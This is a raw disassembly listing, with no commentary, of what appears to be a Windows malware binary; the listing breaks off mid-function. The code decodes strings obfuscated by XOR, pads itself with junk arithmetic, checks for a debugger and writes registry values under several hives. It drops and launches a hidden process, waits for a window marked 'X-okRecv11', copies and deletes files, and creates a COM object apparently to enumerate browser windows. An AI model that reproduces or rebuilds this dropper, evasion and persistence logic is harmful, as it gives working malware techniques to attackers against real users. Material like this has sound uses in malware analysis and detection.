push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hObject], eax
mov [ebp+var_30048], 473Dh
add [ebp+var_30048], 10D3h
push [ebp+Dest] ; lpString
call lstrlenA ; lstrlenA
push 0 ; lpOverlapped
lea edi, [ebp+NumberOfBytesWritten]
push edi ; lpNumberOfBytesWritten
push eax ; nNumberOfBytesToWrite
push [ebp+Dest] ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; WriteFile
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
push [ebp+Dest] ; hMem
call LocalFree ; LocalFree
cmp [ebp+var_3001C], 0
jnz short loc_405E78
push ebx ; hMem
call LocalFree ; LocalFree
jmp short loc_405E7D
; ---------------------------------------------------------------------------
loc_405E78: ; CODE XREF: sub_4054C8+9A6�j
or eax, 0FFFFFFFFh
jmp short loc_405E83
; ---------------------------------------------------------------------------
loc_405E7D: ; CODE XREF: sub_4054C8+9AE�j
mov eax, [ebp+var_30014]
loc_405E83: ; CODE XREF: sub_4054C8+9B3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4054C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E88 proc near ; CODE XREF: sub_4061F7:loc_40632D�p
var_2124 = dword ptr -2124h
var_2120 = byte ptr -2120h
var_1121 = byte ptr -1121h
var_130 = dword ptr -130h
var_12B = byte ptr -12Bh
var_126 = byte ptr -126h
lpValueName = dword ptr -124h
lpSubKey = dword ptr -120h
var_11C = word ptr -11Ch
var_11A = byte ptr -11Ah
var_114 = byte ptr -114h
var_10D = byte ptr -10Dh
var_10A = word ptr -10Ah
Data = byte ptr -108h
var_101 = byte ptr -101h
SubKey = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2124h
call sub_40C6B8
push esi
push edi
call GetLastError
lea edi, [ebp+var_10D]
lea esi, byte_4422F3
mov ecx, 3
rep movsb
lea edi, [ebp+var_114]
lea esi, word_4422F6
mov ecx, 7
rep movsb
and dword ptr [ebp+Data], 0
mov [ebp+var_101], 0
jmp loc_406024
; ---------------------------------------------------------------------------
loc_405ED5: ; CODE XREF: sub_405E88+1A4�j
call GetCurrentThreadId ; GetCurrentThreadId
push 44h ; Size
push offset byte_4471CF ; Src
call sub_405138
movzx edi, [ebp+var_101]
push edi
push eax ; Format
lea edi, [ebp+SubKey]
push edi ; Dest
call sprintf ; sprintf
call GetVersion ; GetVersion
push 4 ; Size
push offset word_4471CA ; Src
call sub_405138
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
lea edi, [ebp+SubKey]
push edi ; lpSubKey
push 80000001h ; hKey
call sub_40160A
lea edi, [ebp+var_126]
lea esi, byte_4422FD
mov ecx, 3
rep movsw
push 4 ; Size
push offset word_4471CA ; Src
call sub_405138
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
lea edi, [ebp+SubKey]
push edi ; lpSubKey
push 80000002h ; hKey
call sub_40160A
mov [ebp+lpSubKey], 2D0Fh
mov eax, 37FBh
mul [ebp+lpSubKey]
mov [ebp+var_130], eax
mov [ebp+lpSubKey], eax
push 4Dh ; Size
push offset dword_44717C ; Src
call sub_405138
movzx edi, [ebp+var_101]
push edi
push eax ; Format
lea edi, [ebp+SubKey]
push edi ; Dest
call sprintf ; sprintf
call GetProcessHeap ; GetProcessHeap
push 4 ; Size
push offset word_4471CA ; Src
call sub_405138
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
lea edi, [ebp+SubKey]
push edi ; lpSubKey
push 80000002h ; hKey
call sub_40160A
lea edi, [ebp+var_12B]
lea esi, byte_442303
mov ecx, 5
rep movsb
push 4 ; Size
push offset word_4471CA ; Src
call sub_405138
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
lea edi, [ebp+SubKey]
push edi ; lpSubKey
push 80000001h ; hKey
call sub_40160A
add esp, 0A8h
call GetProcessHeap ; GetProcessHeap
add [ebp+var_101], 1
loc_406024: ; CODE XREF: sub_405E88+48�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_405ED5
call GetVersion ; GetVersion
cmp eax, 80000000h
jb short loc_4060A2
call GetLastError
push 4Ch ; Size
push offset byte_44712F ; Src
call sub_405138
mov [ebp+lpSubKey], eax
push 10h ; Size
push offset aNskoyryklns_yo ; "~NSKOYrYKlNS_YOO"
call sub_405138
mov [ebp+lpValueName], eax
push 3 ; Size
push offset word_44711A ; Src
call sub_405138
push 1 ; dwType
mov edi, 15h
sub edi, dword_44229C
push edi ; cbData
push eax ; lpData
mov edi, [ebp+lpValueName]
push edi ; lpValueName
mov edi, [ebp+lpSubKey]
push edi ; lpSubKey
push 80000003h ; hKey
call sub_40160A
add esp, 30h
jmp loc_406140
; ---------------------------------------------------------------------------
loc_4060A2: ; CODE XREF: sub_405E88+1B4�j
mov ax, word_442308
mov word ptr [ebp+lpValueName+2], ax
mov eax, dword_44230A
mov [ebp+var_2124], eax
lea eax, [ebp+var_1121]
push eax ; LPSTR
call sub_40506F
call GetProcessHeap ; GetProcessHeap
push 59h ; Size
push offset dword_4470C0 ; Src
call sub_405138
lea edi, [ebp+var_1121]
push edi
push eax ; Format
lea edi, [ebp+var_2120]
push edi ; Dest
call sprintf ; sprintf
call GetTickCount ; GetTickCount
and [ebp+lpSubKey], 0
push 0Ch ; Size
push offset byte_4470B3 ; Src
call sub_405138
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+lpSubKey]
push edi ; lpData
push eax ; lpValueName
lea edi, [ebp+var_2120]
push edi ; lpSubKey
push 80000003h ; hKey
call sub_40160A
add esp, 38h
mov [ebp+var_11C], 3003h
movzx eax, [ebp+var_11C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_11C], ax
loc_406140: ; CODE XREF: sub_405E88+215�j
push 3Bh ; Size
push offset byte_447077 ; Src
call sub_405138
mov [ebp+lpSubKey], eax
push 11h ; Size
push offset aPsPioynszzpury ; "{PS^]PiOYNsZZPURY"
call sub_405138
push 4 ; dwType
push 4 ; cbData
lea edi, [ebp+Data]
push edi ; lpData
push eax ; lpValueName
mov edi, [ebp+lpSubKey]
push edi ; lpSubKey
push 80000001h ; hKey
call sub_40160A
lea edi, [ebp+var_11A]
lea esi, word_44230E
mov ecx, 3
rep movsw
push 33h ; Size
push offset byte_447031 ; Src
call sub_405138
push 1 ; dwType
push 0 ; cbData
push offset WindowName ; lpData
push offset WindowName ; lpValueName
push eax ; lpSubKey
push 80000001h ; hKey
call sub_40160A
call GetCurrentProcessId ; GetCurrentProcessId
push 3Bh ; Size
push offset byte_446FF5 ; Src
call sub_405138
push 1 ; dwType
push 0 ; cbData
push offset WindowName ; lpData
push offset WindowName ; lpValueName
push eax ; lpSubKey
push 80000001h ; hKey
call sub_40160A
add esp, 68h
mov [ebp+var_10A], 4809h
sub [ebp+var_10A], 555h
pop edi
pop esi
leave
retn
sub_405E88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4061F7(HLOCAL hMem, int, LPCSTR lpFileName, LPCSTR lpString, int, int, int, int)
sub_4061F7 proc near ; CODE XREF: sub_4098A8+29D�p
; sub_4098A8+647�p ...
var_3DF = byte ptr -3DFh
lpBuffer = dword ptr -3DCh
var_3D7 = byte ptr -3D7h
ExistingFileName= byte ptr -3D6h
var_2D2 = byte ptr -2D2h
var_2CD = dword ptr -2CDh
var_2C9 = byte ptr -2C9h
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BB = byte ptr -2BBh
var_2B5 = byte ptr -2B5h
lpSubKey = dword ptr -2B4h
var_2AD = byte ptr -2ADh
var_2A5 = byte ptr -2A5h
var_29F = byte ptr -29Fh
var_298 = byte ptr -298h
var_295 = byte ptr -295h
var_28F = byte ptr -28Fh
Type = dword ptr -28Ch
var_286 = byte ptr -286h
var_281 = dword ptr -281h
var_27D = byte ptr -27Dh
var_278 = dword ptr -278h
var_274 = dword ptr -274h
cbData = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = word ptr -268h
var_266 = word ptr -266h
var_264 = dword ptr -264h
Dst = dword ptr -260h
hObject = dword ptr -25Ch
Source = byte ptr -250h
var_14C = dword ptr -14Ch
StartupInfo = _STARTUPINFOA ptr -148h
WindowName = byte ptr -104h
hMem = dword ptr 8
arg_4 = dword ptr 0Ch
lpFileName = dword ptr 10h
lpString = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3E0h
push ebx
push esi
push edi
lea edi, [ebp+var_27D]
lea esi, dword_442314
mov ecx, 5
rep movsb
and [ebp+var_14C], 0
mov eax, dword_442319
mov [ebp+var_281], eax
xor ebx, ebx
lea edi, [ebp+var_286]
lea esi, byte_44231D
mov ecx, 5
rep movsb
push offset Addend ; lpAddend
call InterlockedIncrement ; InterlockedIncrement
mov [ebp+var_26C], eax
mov [ebp+var_264], 6A69h
mov eax, [ebp+var_264]
mov edx, eax
add edx, eax
mov [ebp+var_264], edx
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
mov [ebp+var_266], 6967h
sub [ebp+var_266], 112Ch
mov [ebp+cbData], 104h
call GetProcessHeap ; GetProcessHeap
push 21h ; Size
push offset byte_446FD3 ; Src
call sub_405138
mov [ebp+lpSubKey], eax
push 4 ; Size
push offset word_446FCE ; Src
call sub_405138
lea edi, [ebp+Type]
push edi ; lpType
lea edi, [ebp+cbData]
push edi ; lpcbData
lea edi, [ebp+Source]
push edi ; lpData
push eax ; lpValueName
mov edi, [ebp+lpSubKey]
push edi ; lpSubKey
push 80000002h ; hKey
call sub_4014C9
add esp, 34h
mov [ebp+var_274], eax
mov [ebp+var_268], 31E9h
sub [ebp+var_268], 5E5h
test eax, eax
jnz short loc_40632D
mov [ebp+var_2B5], 0E2h
add [ebp+var_2B5], 1
push [ebp+hMem] ; hMem
call LocalFree ; LocalFree
lea edi, [ebp+var_2BB]
lea esi, word_442322
mov ecx, 3
rep movsw
xor eax, eax
jmp loc_406810
; ---------------------------------------------------------------------------
loc_40632D: ; CODE XREF: sub_4061F7+103�j
call sub_405E88
lea edi, [ebp+var_28F]
lea esi, byte_442328
mov ecx, 3
rep movsb
push 104h ; nSize
lea eax, [ebp+WindowName]
push eax ; lpDst
lea eax, [ebp+Source]
push eax ; lpSrc
call ExpandEnvironmentStringsA ; ExpandEnvironmentStringsA
lea edi, [ebp+var_295]
lea esi, byte_44232B
mov ecx, 3
rep movsw
push [ebp+var_26C] ; int
push [ebp+arg_18] ; int
push [ebp+arg_14] ; int
push [ebp+arg_10] ; int
push [ebp+lpString] ; lpString
push [ebp+arg_4] ; int
push [ebp+hMem] ; int
lea eax, [ebp+Source]
push eax ; lpFileName
call sub_4054C8
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_4063BC
cmp eax, 0FFFFFFFFh
jz short loc_4063B6
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_4063BC
; ---------------------------------------------------------------------------
loc_4063B6: ; CODE XREF: sub_4061F7+1B0�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_4063BC: ; CODE XREF: sub_4061F7+1AB�j
; sub_4061F7+1BD�j
cmp [ebp+var_14C], 0
jnz short loc_4063DF
mov eax, dword_442331
mov [ebp-2B8h], eax
push [ebp+hMem] ; hMem
call LocalFree ; LocalFree
xor eax, eax
jmp loc_406810
; ---------------------------------------------------------------------------
loc_4063DF: ; CODE XREF: sub_4061F7+1CC�j
push 0Eh ; Size
push offset byte_446FBF ; Src
call sub_405138
push eax ; Source
lea edi, [ebp+WindowName]
push edi ; Dest
call strcat ; strcat
lea edi, [ebp+var_298]
lea esi, byte_442335
mov ecx, 3
rep movsb
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+WindowName]
push eax ; Dest
call strcat ; strcat
call GetProcessHeap ; GetProcessHeap
call sub_4043CA
mov [ebp+var_278], eax
lea edi, [ebp+var_29F]
lea esi, dword_442338
mov ecx, 7
rep movsb
push 44h ; Size
push 0 ; Val
lea eax, [ebp+StartupInfo]
push eax ; Dst
call memset ; memset
call IsDebuggerPresent ; IsDebuggerPresent
push 44h ; Size
push 0 ; Val
lea eax, [ebp+StartupInfo]
push eax ; Dst
call memset ; memset
add esp, 30h
lea edi, [ebp+var_2A5]
lea esi, byte_44233F
mov ecx, 3
rep movsw
mov [ebp+StartupInfo.cb], 44h
lea edi, [ebp+var_2AD]
lea esi, byte_442345
mov ecx, 2
rep movsd
mov [ebp+StartupInfo.dwFlags], 1
mov [ebp+StartupInfo.wShowWindow], 1
cmp [ebp+var_278], 0
jz short loc_4064C5
lea eax, [ebp+StartupInfo]
push eax
call sub_40446E
pop ecx
jmp short loc_4064CE
; ---------------------------------------------------------------------------
loc_4064C5: ; CODE XREF: sub_4061F7+2BD�j
mov [ebp+StartupInfo.wShowWindow], 0
loc_4064CE: ; CODE XREF: sub_4061F7+2CC�j
lea eax, [ebp+Dst]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 20h ; dwCreationFlags
push 0 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
lea eax, [ebp+WindowName]
push eax ; lpCommandLine
push 0 ; lpApplicationName
call CreateProcessA ; CreateProcessA
or eax, eax
jz loc_4067AD
mov eax, dword_44234D
mov [ebp+var_2C4], eax
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
mov dword ptr [ebp-2BCh], 4906h
mov eax, 28BCh
mul dword ptr [ebp-2BCh]
mov [ebp+var_2C8], eax
mov [ebp-2BCh], eax
push 22h ; Size
push offset dword_446F9C ; Src
call sub_405138
push [ebp+var_26C]
push offset word_447346
push eax ; Format
lea edi, [ebp+WindowName]
push edi ; Dest
call sprintf ; sprintf
add esp, 18h
mov [ebp+var_2C0], 5F7Dh
add [ebp+var_2C0], 58F3h
mov [ebp+var_2B5], 0
jmp short loc_4065D0
; ---------------------------------------------------------------------------
loc_406579: ; CODE XREF: sub_4061F7+3E1�j
call GetTickCount ; GetTickCount
push 7 ; Size
push offset aUyznQy ; "uyzN]QY"
call sub_405138
add esp, 8
lea edi, [ebp+WindowName]
push edi ; lpWindowName
push eax ; lpClassName
call FindWindowA ; FindWindowA
mov ebx, eax
or ebx, ebx
jnz short loc_4065DA
mov [ebp+var_2C9], 0BAh
add [ebp+var_2C9], 0Bh
mov eax, dword_44229C
add eax, 3D7h
push eax ; dwMilliseconds
call Sleep ; Sleep
mov eax, dword_442351
mov [ebp+var_2CD], eax
add [ebp+var_2B5], 1
loc_4065D0: ; CODE XREF: sub_4061F7+380�j
mov al, [ebp+var_2B5]
cmp al, 0Ah
jb short loc_406579
loc_4065DA: ; CODE XREF: sub_4061F7+3A7�j
or ebx, ebx
jz loc_40679F
call GetCurrentProcessId ; GetCurrentProcessId
push 0EA60h ; dwMilliseconds
call Sleep ; Sleep
call GetLastError
push 104h ; nMaxCount
lea eax, [ebp+WindowName]
push eax ; lpString
push ebx ; hWnd
call GetWindowTextA ; GetWindowTextA
call GetProcessHeap ; GetProcessHeap
mov eax, 12h
sub eax, dword_44229C
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+WindowName]
push eax
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_406775
lea edi, [ebp+var_2D2]
lea esi, byte_442355
mov ecx, 3
rep movsw
mov [ebp+var_2CD+1], 4072h
inc [ebp+var_2CD+1]
lea eax, [ebp+ExistingFileName]
push eax
push [ebp+arg_4]
call sub_40523D
add esp, 8
or eax, eax
jz loc_406759
call GetCurrentThreadId ; GetCurrentThreadId
push 0 ; bFailIfExists
push [ebp+lpFileName] ; lpNewFileName
lea eax, [ebp+ExistingFileName]
push eax ; lpExistingFileName
call CopyFileA ; CopyFileA
lea edi, [ebp+var_3DF]
lea esi, byte_44235B
mov ecx, 3
rep movsb
lea eax, [ebp+var_14C]
push eax ; int
push [ebp+lpFileName] ; lpFileName
call sub_401A7E
mov [ebp+lpBuffer], eax
call GetCurrentProcessId ; GetCurrentProcessId
push [ebp+lpFileName] ; lpFileName
call DeleteFileA ; DeleteFileA
mov [ebp+var_3D7], 18h
movzx eax, [ebp+var_3D7]
imul eax, 415h
mov [ebp+var_3D7], al
push offset String ; "<HTML><!--"
call lstrlenA ; lstrlenA
push eax ; MaxCount
push offset String ; "<HTML><!--"
push [ebp+lpBuffer] ; Str1
call strncmp ; strncmp
add esp, 14h
or eax, eax
jnz short loc_406727
push offset String ; "<HTML><!--"
call lstrlenA ; lstrlenA
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi ; nNumberOfBytesToWrite
mov edi, eax
add edi, [ebp+lpBuffer]
push edi ; lpBuffer
push [ebp+lpFileName] ; lpFileName
call sub_4051C3
add esp, 0Ch
jmp short loc_406742
; ---------------------------------------------------------------------------
loc_406727: ; CODE XREF: sub_4061F7+504�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+lpFileName] ; lpFileName
call sub_4051C3
add esp, 0Ch
loc_406742: ; CODE XREF: sub_4061F7+52E�j
push [ebp+lpBuffer] ; hMem
call LocalFree ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_406759: ; CODE XREF: sub_4061F7+479�j
mov [ebp+lpBuffer], 14F0h
inc [ebp+lpBuffer]
mov [ebp+var_14C], 1
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_406775: ; CODE XREF: sub_4061F7+43B�j
mov [ebp+var_2CD+1], 789Bh
mov eax, 506Fh
mul [ebp+var_2CD+1]
mov [ebp-2D0h], eax
mov [ebp+var_2CD+1], eax
and [ebp+var_14C], 0
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_40679F: ; CODE XREF: sub_4061F7+3E5�j
call GetCurrentThreadId ; GetCurrentThreadId
and [ebp+var_14C], 0
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_4061F7+301�j
mov dword ptr [ebp-2B8h], 1965h
mov eax, [ebp-2B8h]
mov edx, eax
add edx, eax
mov [ebp-2B8h], edx
and [ebp+var_14C], 0
loc_4067CE: ; CODE XREF: sub_4061F7+560�j
; sub_4061F7+57C�j ...
lea eax, [ebp+Source]
push eax ; lpFileName
call DeleteFileA ; DeleteFileA
call IsDebuggerPresent ; IsDebuggerPresent
push [ebp+hMem] ; hMem
call LocalFree ; LocalFree
call GetLastError
push 0 ; uExitCode
push [ebp+Dst] ; hProcess
call TerminateProcess ; TerminateProcess
mov ebx, 77CCh
inc ebx
push [ebp+Dst] ; hObject
call CloseHandle ; CloseHandle
mov eax, [ebp+var_14C]
loc_406810: ; CODE XREF: sub_4061F7+131�j
; sub_4061F7+1E3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4061F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406815(void *Src, size_t Size)
sub_406815 proc near ; CODE XREF: sub_406A40+AD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+Size]
mov [ebp+var_4], 307h
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_442368
lea eax, ds:41C7C0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_8], 12Ah
xor edi, edi
jmp short loc_406862
; ---------------------------------------------------------------------------
loc_40684B: ; CODE XREF: sub_406815+4F�j
mov eax, dword_442368
add eax, edi
lea eax, ds:41C7C0h[eax]
movsx edx, byte ptr [eax]
xor edx, 16h
mov [eax], dl
inc edi
loc_406862: ; CODE XREF: sub_406815+34�j
cmp edi, esi
jl short loc_40684B
mov [ebp+var_C], 3B6h
mov eax, dword_442368
add eax, esi
mov byte ptr dword_41C7C0[eax], 0
mov edi, dword_442368
inc dword_442368
mov eax, dword_442368
lea eax, [eax+esi+2]
mov dword_442368, eax
add dword_442368, 2
cmp dword_442368, 0DD4h
jle short loc_4068B0
and dword_442368, 0
loc_4068B0: ; CODE XREF: sub_406815+92�j
mov [ebp+var_10], 1F1h
lea eax, dword_41C7C0[edi]
pop edi
pop esi
leave
retn
sub_406815 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4068C1(LPCWSTR lpWideCharStr, LPSTR lpMultiByteStr)
sub_4068C1 proc near ; CODE XREF: sub_406D2E+141�p
; sub_406D2E+562�p ...
var_1 = byte ptr -1
lpWideCharStr = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, [ebp+lpWideCharStr]
mov esi, [ebp+lpMultiByteStr]
mov [ebp+var_1], 73h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push ebx ; lpString
call lstrlenW ; lstrlenW
mov edi, eax
call GetProcessHeap ; GetProcessHeap
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push 1FFFh ; cbMultiByte
push esi ; lpMultiByteStr
push edi ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
call GetLastError
mov byte ptr [esi+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4068C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406911 proc near ; CODE XREF: sub_40696D+C1�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call GetVersion ; GetVersion
cmp dword_442370, 0
jz short loc_406933
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406933: ; CODE XREF: sub_406911+15�j
lea edi, [ebp+var_8]
lea esi, dword_442378
movsd
movsd
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov ebx, 1BD8h
inc ebx
mov eax, [ebp+arg_0]
mov eax, [eax]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, dword_442380
mov [ebp+var_C], eax
call CoUninitialize
pop edi
pop esi
pop ebx
leave
retn
sub_406911 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40696D(LPVOID *ppv)
sub_40696D proc near ; CODE XREF: sub_406D2E+54�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
pclsid = CLSID ptr -16h
var_6 = word ptr -6
var_4 = dword ptr -4
ppv = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov ebx, [ebp+ppv]
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_6], 366h
sub [ebp+var_6], 7E1Dh
and dword ptr [ebx], 0
and dword ptr [ebx+4], 0
push 0 ; pvReserved
call CoInitialize
call GetCurrentThreadId ; GetCurrentThreadId
lea eax, [ebp+pclsid]
push eax ; pclsid
push offset sz ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call CLSIDFromString
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_24], eax
test eax, eax
jnz short loc_406A2D
push ebx ; ppv
push offset riid ; riid
push 4 ; dwClsContext
push 0 ; pUnkOuter
lea eax, [ebp+pclsid]
push eax ; rclsid
call CoCreateInstance
mov [ebp+var_4], eax
lea edi, [ebp+var_1C]
lea esi, dword_442384
mov ecx, 3
rep movsw
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_28], eax
test eax, eax
jnz short loc_406A2D
mov eax, dword_44238A
mov [ebp+var_20], eax
mov eax, ebx
add eax, 4
push eax
push offset dword_447B0C
mov eax, [ebx]
push dword ptr [ebx]
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_2C], eax
test eax, eax
jnz short loc_406A2D
xor eax, eax
inc eax
jmp short loc_406A3B
; ---------------------------------------------------------------------------
loc_406A2D: ; CODE XREF: sub_40696D+4F�j
; sub_40696D+86�j ...
push ebx
call sub_406911
pop ecx
call GetProcessHeap ; GetProcessHeap
xor eax, eax
loc_406A3B: ; CODE XREF: sub_40696D+BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40696D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406A40(int, HWND hWnd)
sub_406A40 proc near ; CODE XREF: sub_406D2E+86�p
var_1004A = byte ptr -1004Ah
var_10044 = word ptr -10044h
var_10042 = byte ptr -10042h
var_1003C = byte ptr -1003Ch
var_10034 = dword ptr -10034h
String = byte ptr -1002Fh
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = word ptr -28h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
hWnd = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004Ch
call sub_40C6B8
push ebx
push esi
push edi
mov [ebp+var_E], 0ADBh
sub [ebp+var_E], 2E5Bh
cmp dword_442374, 0FFFFh
jz short loc_406A6F
and dword_44236C, 0
loc_406A6F: ; CODE XREF: sub_406A40+26�j
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, dword_44236C
cmp [ebp+hWnd], eax
jz loc_406C9D
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+hWnd]
mov dword_44236C, eax
cmp dword_442370, 0
jz short loc_406ABF
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_10044], 0D6h
inc [ebp+var_10044]
and dword_442370, 0
loc_406ABF: ; CODE XREF: sub_406A40+56�j
lea edi, [ebp+var_1003C]
lea esi, word_44238E
movsd
movsd
push 0FFFFh ; nMaxCount
lea eax, [ebp+String]
push eax ; lpString
push [ebp+hWnd] ; hWnd
call GetWindowTextA ; GetWindowTextA
call GetProcessHeap ; GetProcessHeap
push 1Bh ; Size
push offset unk_446F14 ; Src
call sub_406815
mov edi, 0Eh
sub edi, dword_442364
push edi
push eax
lea edi, [ebp+String]
push edi
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406B45
lea edi, [ebp+var_1004A]
lea esi, word_442396
mov ecx, 3
rep movsw
and dword_442370, 0
mov [ebp+var_10044], 1FF4h
inc [ebp+var_10044]
jmp loc_406C9D
; ---------------------------------------------------------------------------
loc_406B45: ; CODE XREF: sub_406A40+D3�j
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
cmp [ebp+var_C], 0
jz loc_406C9D
call GetLastError
or ebx, ebx
jnz loc_406C9D
call GetCurrentThreadId ; GetCurrentThreadId
and [ebp+var_4], 0
cmp dword_442374, 0FFFFh
jz short loc_406BA8
call IsDebuggerPresent ; IsDebuggerPresent
inc dword_442374
mov eax, [ebp+var_C]
cmp dword_442374, eax
jbe short loc_406BA0
and dword_442374, 0
loc_406BA0: ; CODE XREF: sub_406A40+157�j
mov eax, dword_442374
mov [ebp+var_4], eax
loc_406BA8: ; CODE XREF: sub_406A40+141�j
; sub_406A40+250�j
push 0 ; Duration
call _sleep ; _sleep
pop ecx
mov [ebp+var_28], 2
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov dword_442374, eax
lea eax, [ebp+var_14]
push eax
lea esi, [ebp+var_28]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_8], 0E5h
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
or ebx, ebx
jnz short loc_406C65
push offset dword_442370
push offset dword_447B2C
mov eax, [ebp+var_14]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
lea edi, [ebp+var_10042]
lea esi, dword_44239C
mov ecx, 3
rep movsw
or ebx, ebx
jnz short loc_406C65
mov [ebp+var_29], 22h
sub [ebp+var_29], 83h
lea eax, [ebp+var_10034]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
call GetCurrentThreadId ; GetCurrentThreadId
or ebx, ebx
jnz short loc_406C65
mov dword_442374, 0FFFFh
mov eax, [ebp+hWnd]
cmp [ebp+var_10034], eax
jz short loc_406C9D
loc_406C65: ; CODE XREF: sub_406A40+1B5�j
; sub_406A40+1E6�j ...
cmp dword_442370, 0
